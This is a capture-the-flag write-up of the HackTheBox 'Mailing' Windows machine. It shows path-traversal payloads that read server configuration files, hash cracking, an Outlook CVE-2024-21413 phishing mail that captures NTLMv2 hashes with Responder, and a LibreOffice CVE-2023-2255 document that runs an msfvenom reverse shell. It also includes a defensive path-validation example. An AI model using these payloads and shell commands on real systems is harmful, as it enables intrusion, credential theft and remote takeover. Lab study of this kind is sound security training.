xsspresso
Misc / Easy / Windows

HTB — Mailing

A path traversal in the instructions download reads hMailServer.INI and leaks the administrator's MD5 hash. With the cracked SMTP credentials, an Outlook CVE-2024-21413 moniker link makes maya's client authenticate to a Responder SMB share (NTLMv2 capture and offline crack, not a relay), which gives WinRM access. Privesc is LibreOffice 7.4.0.1 (CVE-2023-2255) via a document dropped in the Important Documents share, where it is opened as localadmin.

January 16, 2025 · HackTheBox
#hMailServer #NTLM Relay #CVE-2024-21413 #Path Traversal

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 23:01 EST
Stats: 0:02:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 95.00% done; ETC: 23:03 (0:00:04 remaining)
Stats: 0:04:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 23:05 (0:00:00 remaining)
Nmap scan report for 10.10.11.14
Host is up (0.020s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: completed IMAP4 NAMESPACE QUOTA IDLE IMAP4rev1 CAPABILITY SORT RIGHTS=texkA0001 CHILDREN OK ACL
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: completed IMAP4 NAMESPACE QUOTA IDLE IMAP4rev1 CAPABILITY SORT RIGHTS=texkA0001 CHILDREN OK ACL
|_ssl-date: TLS randomness does not represent time
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
55136/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-17T04:05:26
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   21.84 ms 10.10.14.1
2   21.96 ms 10.10.11.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 293.16 seconds
```

80/tcp open http

```sh
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
```

LFI (path traversal)

  • Click on Download Instructions and intercept the request with Burp Suite.

  • Test the download parameter for path traversal. The endpoint returns the file as an attachment rather than including it, so this is really an arbitrary file read; the classic Windows probe is:

```txt
../../windows/win.ini
```

hMailServer

The same traversal reaches the hMailServer configuration. Spaces in the path are sent as + (form URL encoding), and backslashes work as separators because the server is Windows:

```txt
../../Program+Files+(x86)\hMailServer\Bin\hMailServer.INI
```
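Why both payloads above land where they do, and what the download handler should have done instead: an added Python illustration, not the site's PHP code (the writeup never shows it). The serving folder C:\wwwroot\instructions is a hypothetical assumption; ntpath is used deliberately so the Windows path semantics (both separators, drive letters, UNC) are exercised on whatever OS you run this on, and unquote_plus undoes the + encoding used in the second payload.

```python
import ntpath
from urllib.parse import unquote_plus

# Hypothetical folder the download handler serves from (an assumption; the
# writeup does not show the site's code or its directory layout).
DOWNLOAD_DIR = r"C:\wwwroot\instructions"


def naive_resolve(base_dir, user_path):
    """The vulnerable pattern: join the serving folder with whatever the
    client sent and open the result. ntpath applies Windows rules ('/' and
    '\\' are both separators, drive letters, UNC paths) on any host OS."""
    return ntpath.normpath(ntpath.join(base_dir, unquote_plus(user_path)))


def safe_resolve(base_dir, user_path):
    """Hardened version: normalise first, then require the result to still
    sit below base_dir. Returns None for anything that escapes (../
    traversal, absolute paths, other drives, UNC shares)."""
    base = ntpath.normpath(base_dir)
    candidate = ntpath.normpath(ntpath.join(base, unquote_plus(user_path)))
    try:
        common = ntpath.commonpath([base, candidate])
    except ValueError:  # different drive or a UNC share: cannot be inside base
        return None
    if common != base:
        return None
    return candidate


# The two payloads used in the writeup, exactly as sent (note the '+' encoding).
WIN_INI = "../../windows/win.ini"
HMAIL_INI = r"../../Program+Files+(x86)\hMailServer\Bin\hMailServer.INI"

if __name__ == "__main__":
    for p in (WIN_INI, HMAIL_INI, "instructions.pdf", r"\\10.10.14.6\share\x"):
        print(f"{p!r:62} naive -> {naive_resolve(DOWNLOAD_DIR, p)}")
        print(f"{'':62} safe  -> {safe_resolve(DOWNLOAD_DIR, p)}")
```

The containment check has to run on the normalised candidate, not on the raw input: filtering the literal string `../` is what string-based blacklists get wrong (`..\`, `%2e%2e/` and absolute or UNC paths all bypass it), whereas comparing the resolved path against the base folder rejects all of them for the same reason.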

```txt
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Pragma: public
Content-Type: application/octet-stream
Expires: 0
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Description: File Transfer
Content-Disposition: attachment; filename="hMailServer.INI"
X-Powered-By: ASP.NET
Date: Fri, 17 Jan 2025 05:03:58 GMT
Connection: close
Content-Length: 604

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5ac...
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8...
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
```
The [Security] section stores the hMailServer administrator password as an unsalted MD5 hash (AdministratorPassword=841bb5ac...), so hashcat mode 0 with rockyou cracks it straight away:

```sh
hashcat -m 0 '841bb5ac...' /usr/share/wordlists/rockyou.txt

841bb5ac...:homenetworkingadministrator
```
  • Follow the downloaded instructions, which walk through configuring a mail client against mailing.htb; Thunderbird works fine:

```sh
sudo apt install thunderbird
```

  • Add mailing.htb to /etc/hosts pointing at 10.10.11.14 first: the web site redirects to that hostname and the mail client has to resolve it.

CVE-2024-21413

  • https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

  • The PoC sends a mail through mailing.htb (authenticated on 587 with the cracked administrator credentials) containing a file:// moniker link to an SMB share we control. The trailing "!" in the link is what gets it past Outlook's Protected View, so when maya's Outlook follows it the client connects to \\10.10.14.6\share and authenticates, handing Responder her NTLMv2 response. Despite the tag, nothing is relayed here: the response is captured and cracked offline.

```sh
python3 CVE-2024-21413.py --server "10.10.11.14" --port 587 --username "administrator@mailing.htb" --password "homenetworkingadministrator" --sender "administrator@mailing.htb" --recipient "maya@mailing.htb" --url "\\10.10.14.6\share" --subject "Please this is important"

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de

 Email sent successfully.
```
```sh
sudo responder -I tun0

[SMB] NTLMv2-SSP Client   : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:e310528bce7e9100:1068AF9D06C2A9B351B4901F3775635B:010100000000000000A7C9E91869DB01D6863686B5E7E44900000000020008005500310033004E0001001E00570049004E002D0052005000410056004E0046003000360056004B00420004003400570049004E002D0052005000410056004E0046003000360056004B0042002E005500310033004E002E004C004F00430041004C00030014005500310033004E002E004C004F00430041004C00050014005500310033004E002E004C004F00430041004C000700080000A7C9E91869DB0106000400020000000800300030000000000000000000000000200000209F0A44EE6FC9A4D8BE239F8F0CA685844AE375865470E0545FDAF505814E1B0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
```

hashcat

```sh
hashcat -m 5600 maya.ntlmv2 /usr/share/wordlists/rockyou.txt

MAYA::MAILING:e310528bce7e9100:1068af9d...:...:m4y4ngs4ri
```

creds

maya:m4y4ngs4ri

```sh
nxc winrm 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri'
WINRM       10.10.11.14     5985   MAILING          [*] Windows 10 / Server 2019 Build 19041 (name:MAILING) (domain:MAILING)
WINRM       10.10.11.14     5985   MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
```

winrm

```sh
evil-winrm -i 10.10.11.14 -u 'maya' -p 'm4y4ngs4ri'
```

user.txt

```sh
*Evil-WinRM* PS C:\Users\maya\Desktop> cat user.txt
e39e367a...
```

priv esc

```sh
*Evil-WinRM* PS C:\Users\maya> upload /opt/windows/winPEASx64.exe
```

```sh
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 1
    FilterAdministratorToken: 
      [*] LocalAccountTokenFilterPolicy set to 1.
      [+] Any local account can be used for lateral movement.
```

```sh
╔══════════╣ Checking write permissions in PATH folders (DLL Hijacking)
╚ Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\
    C:\Windows\System32\OpenSSH\
    C:\Program Files\Git\cmd
    C:\Program Files\dotnet\
    (DLL Hijacking) C:\Users\maya\AppData\Local\Programs\Python\Python312: maya [AllAccess]
```

  • The only writable PATH entry is maya's own Python folder, which is a privesc vector only if a process running as someone else searches PATH for a DLL from there; nothing here does, so the escalation goes through LibreOffice instead. LocalAccountTokenFilterPolicy=1 is the detail behind the "lateral movement" note: a local administrator authenticating over the network (SMB, WinRM) gets a full rather than a UAC-filtered token.

LibreOffice 7.4.0.1 CVE-2023-2255

Looking at installed software instead, LibreOffice is present under C:\Program Files and its version.ini gives the exact build:

```sh
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> cat version.ini
[Version]
AllLanguages=en-US af am ar as ast be bg bn bn-IN bo br brx bs ca ca-valencia ckb cs cy da de dgo dsb dz el en-GB en-ZA eo es et eu fa fi fr fur fy ga gd gl gu gug he hsb hi hr hu id is it ja ka kab kk km kmr-Latn kn ko kok ks lb lo lt lv mai mk ml mn mni mr my nb ne nl nn nr nso oc om or pa-IN pl pt pt-BR ro ru rw sa-IN sat sd sr-Latn si sid sk sl sq sr ss st sv sw-TZ szl ta te tg th tn tr ts tt ug uk uz ve vec vi xh zh-CN zh-TW zu
buildid=43e5fcfbbadd18fccee5a6f42ddd533e40151bcf
ExtensionUpdateURL=https://updateexte.libreoffice.org/ExtensionUpdateService/check.Update
MsiProductVersion=7.4.0.1
ProductCode={A3C6520A-E485-47EE-98CC-32D6BB0529E4}
ReferenceOOoMajorMinor=4.1
UpdateChannel=
UpdateID=LibreOffice_7_en-US_af_am_ar_as_ast_be_bg_bn_bn-IN_bo_br_brx_bs_ca_ca-valencia_ckb_cs_cy_da_de_dgo_dsb_dz_el_en-GB_en-ZA_eo_es_et_eu_fa_fi_fr_fur_fy_ga_gd_gl_gu_gug_he_hsb_hi_hr_hu_id_is_it_ja_ka_kab_kk_km_kmr-Latn_kn_ko_kok_ks_lb_lo_lt_lv_mai_mk_ml_mn_mni_mr_my_nb_ne_nl_nn_nr_nso_oc_om_or_pa-IN_pl_pt_pt-BR_ro_ru_rw_sa-IN_sat_sd_sr-Latn_si_sid_sk_sl_sq_sr_ss_st_sv_sw-TZ_szl_ta_te_tg_th_tn_tr_ts_tt_ug_uk_uz_ve_vec_vi_xh_zh-CN_zh-TW_zu
UpdateURL=https://update.libreoffice.org/check.php
UpgradeCode={4B17E523-5D91-4E69-BD96-7FD81CFA81BB}
UpdateUserAgent=<PRODUCT> (${buildid}; ${_OS}; ${_ARCH}; <OPTIONAL_OS_HW_DATA>)
Vendor=The Document Foundation
```
 
  • https://github.com/elweth-sec/CVE-2023-2255

  • 7.4.0.1 predates the 7.4.7 / 7.5.3 releases that fixed CVE-2023-2255, where floating frames in a document load their linked target without prompting the user; the PoC turns that into command execution when the document is opened. Generate a reverse shell and stage it somewhere maya can write:

```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o reverse.exe
```

```sh
*Evil-WinRM* PS C:\users\maya> upload /home/sake/htb-labs/Mailing/reverse.exe
```
  • The .odt has to go into the "Important Documents" share (C:\Important Documents). Something on the box opens files placed there and then deletes them, and the shell comes back as localadmin, so if the file vanishes without a callback just upload it again.

```sh
*Evil-WinRM* PS C:\Important Documents> ls


    Directory: C:\Important Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/18/2025   6:41 AM             14 test.txt


*Evil-WinRM* PS C:\Important Documents> whoami
mailing\maya
*Evil-WinRM* PS C:\Important Documents> ls
```

```sh
python3 CVE-2023-2255.py --cmd 'cmd.exe /c C:\users\maya\reverse.exe' --output rev.odt

File rev.odt has been created !
```
```sh
smbclient \\\\10.10.11.14\\"Important Documents" -U 'mailing/maya'
Password for [MAILING\maya]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jan 18 00:42:12 2025
  ..                                  D        0  Sat Jan 18 00:42:12 2025

		8067583 blocks of size 4096. 1102513 blocks available
smb: \> put rev.odt 
putting file rev.odt as \rev.odt (304.1 kb/s) (average 304.1 kb/s)
```
```cmd
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.14] 57876
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
mailing\localadmin
```

The shell's working directory is LibreOffice's program folder and the user is localadmin: soffice, running as localadmin, launched the payload when it opened rev.odt.

root.txt

```cmd
C:\Users\localadmin\Desktop>type root.txt
type root.txt
1b0afbdf...
```